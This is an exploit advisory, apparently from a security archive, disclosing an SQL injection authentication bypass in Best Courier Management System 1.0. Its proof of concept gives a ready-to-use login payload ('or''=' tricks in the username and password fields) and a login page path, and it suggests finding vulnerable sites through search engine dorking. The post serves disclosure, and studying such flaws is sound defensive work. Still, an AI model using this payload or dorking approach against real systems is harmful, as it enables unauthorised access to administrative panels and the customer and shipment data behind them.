Best Courier Management System 1.0 SQL Injection

Best Courier Management System 1.0 SQL Injection
Posted Aug 5, 2024
Authored by indoushka

Best Courier Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection, bypass
SHA-256 | 7bf8d850cb1870953a38d53d85bb8aadba11dd9744f23e9616abc56e07e0916a
=============================================================================================================================================
| # Title : Best Courier Management System v1.0 Auth By Pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] use payload : user : 'or''='@gmail.com & pass = 'or''='

[+] Panel : http://127.0.0.1/gaatitrack/login.php

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

نوشته های مشابه